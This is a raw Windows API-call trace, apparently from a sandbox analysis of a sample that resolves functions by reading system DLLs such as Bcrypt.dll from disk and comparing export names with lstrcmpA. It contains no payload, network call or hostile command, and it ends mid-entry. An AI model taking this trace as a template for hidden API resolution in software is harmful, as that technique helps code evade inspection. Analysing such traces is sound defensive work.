[0270.710] lstrcmpA (lpString1="Control_RunDLLW", lpString2="CDefFolderMenu_Create2") returned 1 [0270.710] lstrcmpA (lpString1="Control_RunDLLW", lpString2="CIDLData_CreateFromIDArray") returned 1 [0270.710] lstrcmpA (lpString1="Control_RunDLLW", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0270.710] lstrcmpA (lpString1="Control_RunDLLW", lpString2="CheckEscapesW") returned 1 [0270.710] lstrcmpA (lpString1="Control_RunDLLW", lpString2="CommandLineToArgvW") returned 1 [0270.710] lstrcmpA (lpString1="Control_RunDLLW", lpString2="Control_RunDLL") returned 1 [0270.710] lstrcmpA (lpString1="Control_RunDLLW", lpString2="Control_RunDLLA") returned 1 [0270.710] lstrcmpA (lpString1="Control_RunDLLW", lpString2="Control_RunDLLAsUserW") returned 1 [0270.710] lstrcmpA (lpString1="Control_RunDLLW", lpString2="Control_RunDLLW") returned 0 [0270.710] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="AppCompat_RunDLLW") returned 1 [0270.710] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="AssocCreateForClasses") returned 1 [0270.710] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="AssocGetDetailsOfPropKey") returned 1 [0270.710] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CDefFolderMenu_Create2") returned 1 [0270.710] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CIDLData_CreateFromIDArray") returned 1 [0270.710] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0270.710] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CheckEscapesW") returned 1 [0270.710] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CommandLineToArgvW") returned 1 [0270.710] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="Control_RunDLL") returned 1 [0270.711] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="Control_RunDLLA") returned 1 [0270.711] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="Control_RunDLLAsUserW") returned 1 [0270.711] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="Control_RunDLLW") returned 1 [0270.711] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 0 [0270.711] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="AppCompat_RunDLLW") returned 1 [0270.711] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="AssocCreateForClasses") returned 1 [0270.711] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="AssocGetDetailsOfPropKey") returned 1 [0270.711] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CDefFolderMenu_Create2") returned 1 [0270.711] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CIDLData_CreateFromIDArray") returned 1 [0270.711] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0270.711] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CheckEscapesW") returned 1 [0270.711] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CommandLineToArgvW") returned 1 [0270.711] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="Control_RunDLL") returned 1 [0270.711] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="Control_RunDLLA") returned 1 [0270.711] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="Control_RunDLLAsUserW") returned 1 [0270.711] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="Control_RunDLLW") returned 1 [0270.711] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0270.711] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 0 [0270.711] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="AppCompat_RunDLLW") returned 1 [0270.711] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="AssocCreateForClasses") returned 1 [0270.711] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="AssocGetDetailsOfPropKey") returned 1 [0270.712] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CDefFolderMenu_Create2") returned 1 [0270.712] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CIDLData_CreateFromIDArray") returned 1 [0270.712] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0270.712] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CheckEscapesW") returned 1 [0270.712] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CommandLineToArgvW") returned 1 [0270.712] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="Control_RunDLL") returned 1 [0270.712] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="Control_RunDLLA") returned 1 [0270.712] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="Control_RunDLLAsUserW") returned 1 [0270.712] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="Control_RunDLLW") returned 1 [0270.712] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0270.712] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0270.712] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 0 [0270.712] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="AppCompat_RunDLLW") returned 1 [0270.712] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="AssocCreateForClasses") returned 1 [0270.712] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="AssocGetDetailsOfPropKey") returned 1 [0270.712] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CDefFolderMenu_Create2") returned 1 [0270.712] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CIDLData_CreateFromIDArray") returned 1 [0270.712] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0270.712] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CheckEscapesW") returned 1 [0270.712] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CommandLineToArgvW") returned 1 [0270.712] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="Control_RunDLL") returned 1 [0270.713] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="Control_RunDLLA") returned 1 [0270.713] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="Control_RunDLLAsUserW") returned 1 [0270.713] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="Control_RunDLLW") returned 1 [0270.713] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0270.713] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0270.713] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0270.713] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 0 [0270.713] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="AppCompat_RunDLLW") returned 1 [0270.713] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="AssocCreateForClasses") returned 1 [0270.713] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="AssocGetDetailsOfPropKey") returned 1 [0270.713] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CDefFolderMenu_Create2") returned 1 [0270.713] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CIDLData_CreateFromIDArray") returned 1 [0270.713] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0270.713] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CheckEscapesW") returned 1 [0270.714] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CommandLineToArgvW") returned 1 [0270.714] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="Control_RunDLL") returned 1 [0270.714] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="Control_RunDLLA") returned 1 [0270.714] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="Control_RunDLLAsUserW") returned 1 [0270.714] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="Control_RunDLLW") returned 1 [0270.714] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0270.714] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0270.714] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0270.714] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0270.714] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 0 [0270.714] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="AppCompat_RunDLLW") returned 1 [0270.714] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="AssocCreateForClasses") returned 1 [0270.714] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="AssocGetDetailsOfPropKey") returned 1 [0270.714] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CDefFolderMenu_Create2") returned 1 [0270.715] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CIDLData_CreateFromIDArray") returned 1 [0270.715] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0270.715] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CheckEscapesW") returned 1 [0270.715] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CommandLineToArgvW") returned 1 [0270.715] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="Control_RunDLL") returned 1 [0270.715] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="Control_RunDLLA") returned 1 [0270.715] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="Control_RunDLLAsUserW") returned 1 [0270.715] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="Control_RunDLLW") returned 1 [0270.715] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0270.715] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0270.715] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0270.715] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0270.715] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 1 [0270.716] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle") returned 0 [0270.716] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="AppCompat_RunDLLW") returned 1 [0270.716] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="AssocCreateForClasses") returned 1 [0270.716] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="AssocGetDetailsOfPropKey") returned 1 [0270.716] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CDefFolderMenu_Create2") returned 1 [0270.716] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CIDLData_CreateFromIDArray") returned 1 [0270.716] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0270.716] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CheckEscapesW") returned 1 [0270.716] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CommandLineToArgvW") returned 1 [0270.716] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="Control_RunDLL") returned 1 [0270.716] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="Control_RunDLLA") returned 1 [0270.716] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="Control_RunDLLAsUserW") returned 1 [0270.716] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="Control_RunDLLW") returned 1 [0270.716] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0270.716] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0270.717] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0270.717] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0270.717] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 1 [0270.717] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle") returned 1 [0270.717] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage") returned 0 [0270.717] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="AppCompat_RunDLLW") returned 1 [0270.717] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="AssocCreateForClasses") returned 1 [0270.717] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="AssocGetDetailsOfPropKey") returned 1 [0270.717] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CDefFolderMenu_Create2") returned 1 [0270.717] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CIDLData_CreateFromIDArray") returned 1 [0270.717] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CStorageItem_GetValidatedStorageItemObject") returned 1 [0270.717] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CheckEscapesW") returned 1 [0270.717] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CommandLineToArgvW") returned 1 [0270.717] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="Control_RunDLL") returned 1 [0270.717] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="Control_RunDLLA") returned 1 [0270.717] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="Control_RunDLLAsUserW") returned 1 [0270.717] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="Control_RunDLLW") returned 1 [0270.717] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0270.717] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0270.717] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0270.717] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0270.717] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 1 [0270.717] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle") returned 1 [0270.717] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage") returned 1 [0270.717] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="DAD_AutoScroll") returned 0 [0270.718] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="AppCompat_RunDLLW") returned 1 [0270.718] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="AssocCreateForClasses") returned 1 [0270.718] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="AssocGetDetailsOfPropKey") returned 1 [0270.718] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CDefFolderMenu_Create2") returned 1 [0270.718] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CIDLData_CreateFromIDArray") returned 1 [0270.718] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CStorageItem_GetValidatedStorageItemObject") returned 1 [0270.718] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CheckEscapesW") returned 1 [0270.718] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CommandLineToArgvW") returned 1 [0270.718] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="Control_RunDLL") returned 1 [0270.718] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="Control_RunDLLA") returned 1 [0270.718] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="Control_RunDLLAsUserW") returned 1 [0270.718] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="Control_RunDLLW") returned 1 [0270.718] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0270.718] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0270.718] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0270.718] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0270.718] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 1 [0270.718] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle") returned 1 [0270.718] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage") returned 1 [0270.718] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="DAD_AutoScroll") returned 1 [0270.718] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="DAD_DragEnterEx") returned 0 [0270.719] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="AppCompat_RunDLLW") returned 1 [0270.719] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="AssocCreateForClasses") returned 1 [0270.719] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="AssocGetDetailsOfPropKey") returned 1 [0270.719] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CDefFolderMenu_Create2") returned 1 [0270.719] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CIDLData_CreateFromIDArray") returned 1 [0270.719] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CStorageItem_GetValidatedStorageItemObject") returned 1 [0270.719] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CheckEscapesW") returned 1 [0270.719] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CommandLineToArgvW") returned 1 [0270.719] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="Control_RunDLL") returned 1 [0270.719] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="Control_RunDLLA") returned 1 [0270.719] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="Control_RunDLLAsUserW") returned 1 [0270.719] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="Control_RunDLLW") returned 1 [0270.719] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0270.719] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0270.719] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0270.719] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0270.719] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 1 [0270.719] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle") returned 1 [0270.893] GetProcessHeap () returned 0x400000 [0270.894] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x3ff3040 | out: hHeap=0x400000) returned 1 [0271.312] GetProcessHeap () returned 0x400000 [0271.312] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x10) returned 0x4192e0 [0271.312] LoadLibraryA (lpLibFileName="Bcrypt.dll") returned 0x7ffc5bcc0000 [0271.443] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0271.443] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0271.444] GetModuleFileNameA (in: hModule=0x7ffc5bcc0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\Bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll")) returned 0x1e [0271.444] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\Bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0271.445] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0271.445] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0271.445] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=159648) returned 1 [0271.445] GetProcessHeap () returned 0x400000 [0271.445] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x26fa0) returned 0x2c32010 [0271.448] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0271.448] ReadFile (in: hFile=0x15c, lpBuffer=0x2c32010, nNumberOfBytesToRead=0x26fa0, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2c32010*, lpNumberOfBytesRead=0x14f5a4*=0x26fa0, lpOverlapped=0x0) returned 1 [0271.452] CloseHandle (hObject=0x15c) returned 1 [0271.453] lstrcmpA (lpString1="BCryptAddContextFunction", lpString2="BCryptAddContextFunction") returned 0 [0271.453] lstrcmpA (lpString1="BCryptAddContextFunctionProvider", lpString2="BCryptAddContextFunction") returned 1 [0271.453] lstrcmpA (lpString1="BCryptAddContextFunctionProvider", lpString2="BCryptAddContextFunctionProvider") returned 0 [0271.453] lstrcmpA (lpString1="BCryptCloseAlgorithmProvider", lpString2="BCryptAddContextFunction") returned 1 [0271.453] lstrcmpA (lpString1="BCryptCloseAlgorithmProvider", lpString2="BCryptAddContextFunctionProvider") returned 1 [0271.453] lstrcmpA (lpString1="BCryptCloseAlgorithmProvider", lpString2="BCryptCloseAlgorithmProvider") returned 0 [0271.453] lstrcmpA (lpString1="BCryptConfigureContext", lpString2="BCryptAddContextFunction") returned 1 [0271.454] lstrcmpA (lpString1="BCryptConfigureContext", lpString2="BCryptAddContextFunctionProvider") returned 1 [0271.454] lstrcmpA (lpString1="BCryptConfigureContext", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0271.454] lstrcmpA (lpString1="BCryptConfigureContext", lpString2="BCryptConfigureContext") returned 0 [0271.454] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptAddContextFunction") returned 1 [0271.454] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptAddContextFunctionProvider") returned 1 [0271.454] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0271.454] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptConfigureContext") returned 1 [0271.454] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptConfigureContextFunction") returned 0 [0271.454] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptAddContextFunction") returned 1 [0271.454] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptAddContextFunctionProvider") returned 1 [0271.454] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0271.454] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptConfigureContext") returned 1 [0271.454] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptConfigureContextFunction") returned 1 [0271.454] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptCreateContext") returned 0 [0271.454] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptAddContextFunction") returned 1 [0271.454] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptAddContextFunctionProvider") returned 1 [0271.454] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0271.455] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptConfigureContext") returned 1 [0271.455] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptConfigureContextFunction") returned 1 [0271.455] 